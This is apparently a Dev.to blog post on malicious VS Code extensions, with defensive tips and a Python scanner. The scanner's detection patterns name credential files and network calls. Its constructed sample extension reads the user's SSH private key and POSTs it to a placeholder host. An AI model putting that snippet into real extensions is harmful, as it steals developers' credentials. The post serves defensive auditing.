VS Code's Unhinged Malware Problem: What Microsoft’s Own Logs Reveal
Source: Dev.to
Introduction
If you are like me, your VS Code setup is a carefully curated collection of themes, linters, and productivity boosters. We trust the Visual Studio Marketplace to be a safe haven for tools that make our lives easier. However, a look at the official list of removed extensions on GitHub reveals a much uglier picture.
The Marketplace operates on a reactive model. Microsoft runs automated scans, but a large amount of malicious code is only taken down after it has already been published and downloaded by unsuspecting developers.
Types of Malicious Extensions
- Credential Theft – Extensions that scrape .env files, SSH keys, or other sensitive credentials.
- Typosquatting – Malicious clones of popular extensions (e.g., Prettier, ESLint) that rely on a tiny misspelling in the name to trick users.
- Remote Access – Plugins that open backdoors into your development environment, allowing attackers to read files, track keystrokes, and exfiltrate data.
How to Protect Yourself
Check the Publisher
Look for the “Verified” checkmark. If a popular tool is published by a random account with no history, avoid it.
Verify the Numbers
If an extension claims to be a widely used tool but has only a few hundred downloads while the legitimate one has millions, it is likely a typosquatting attempt.
Audit Your List
Periodically review your installed extensions. Extensions that haven’t been updated in years should be re‑evaluated for safety.
Do a Deeper Scan
Basic store filters can be bypassed. Use a dedicated VS Code extension security analyzer to perform a deeper static assessment of the package itself: flag obfuscated code, hidden network connections, and dangerous dependencies. The analyzer should produce a risk report before the extension's code ever runs on your machine.
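As an added example (not the post's code or any particular analyzer's), here is a small Python checker that applies the checks above to an unpacked extension directory, the layout VS Code uses under ~/.vscode/extensions/<publisher>.<name>-<version>. The regex heuristics, the "risk score", and the sample typosquat extension it builds in a temp directory are all constructed for illustration.

```python
import json
import re
import tempfile
from pathlib import Path
# Heuristics for the behaviours the post describes: credential scraping, hidden network
# calls and obfuscation. A hit means "read this file", not "this is malware".
SUSPICIOUS_PATTERNS = {
    "eval_or_function_ctor": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "spawns_processes": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "outbound_network": re.compile(r"\bfetch\s*\(|https?\.request\s*\(|new\s+WebSocket\s*\("),
    "touches_credentials": re.compile(r"\.env\b|\.ssh\b|id_rsa|\.aws/credentials"),
    "long_base64_blob": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
    "hex_escaped_string": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
}

def scan_extension(ext_dir: Path) -> dict:
    """Scan one unpacked extension directory (package.json + JS) and return a findings report."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    hits = {}
    # "*" or onStartupFinished runs the extension on every launch, before you open any file.
    if any(ev in ("*", "onStartupFinished") for ev in manifest.get("activationEvents", [])):
        hits["activates_on_every_startup"] = ["package.json"]
    for js in sorted(ext_dir.rglob("*.js")):  # bundled node_modules dependencies are scanned too
        text = js.read_text(encoding="utf-8", errors="replace")
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(text):
                hits.setdefault(name, []).append(js.relative_to(ext_dir).as_posix())
    return {"name": manifest.get("name", "?"), "publisher": manifest.get("publisher", "?"),
            "risk_score": len(hits), "hits": hits}

def build_sample_extension(root: Path) -> Path:
    """Write a CONSTRUCTED typosquat-style extension that shows several red flags at once."""
    ext = root / "fake-publisher.prettier-formater-0.0.1"
    (ext / "out").mkdir(parents=True)
    (ext / "package.json").write_text(json.dumps({"name": "prettier-formater",
        "publisher": "fake-publisher", "activationEvents": ["*"], "main": "./out/extension.js"}))
    (ext / "out" / "extension.js").write_text(
        "const fs = require('fs'), os = require('os'), cp = require('child_process');\n"
        "function activate() {\n"
        "  const key = fs.readFileSync(os.homedir() + '/.ssh/id_rsa', 'utf8');\n"
        "  fetch('https://example.invalid/collect', {method: 'POST', body: key});\n"
        "  eval('\\x63\\x6f\\x6e\\x73\\x6f\\x6c\\x65\\x2e\\x6c\\x6f\\x67(1)');\n"
        "}\nmodule.exports = { activate };\n")
    return ext

def scan_sample() -> dict:
    """Build the constructed sample in a temp dir and scan it (demo entry point)."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_extension(build_sample_extension(Path(tmp)))
```

To audit your own install, call `scan_extension(Path.home() / ".vscode" / "extensions" / "<publisher>.<name>-<version>")` for each directory and read every flagged file before deciding; a high score on a popular, verified extension usually just means it legitimately talks to the network.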
Conclusion
The VS Code Marketplace is an incredible resource, but we must stop assuming it is inherently safe. The “Removed Packages” list proves that malware continuously slips through the cracks. Spend a few minutes today auditing your extensions—it’s far better than dealing with a compromised machine later.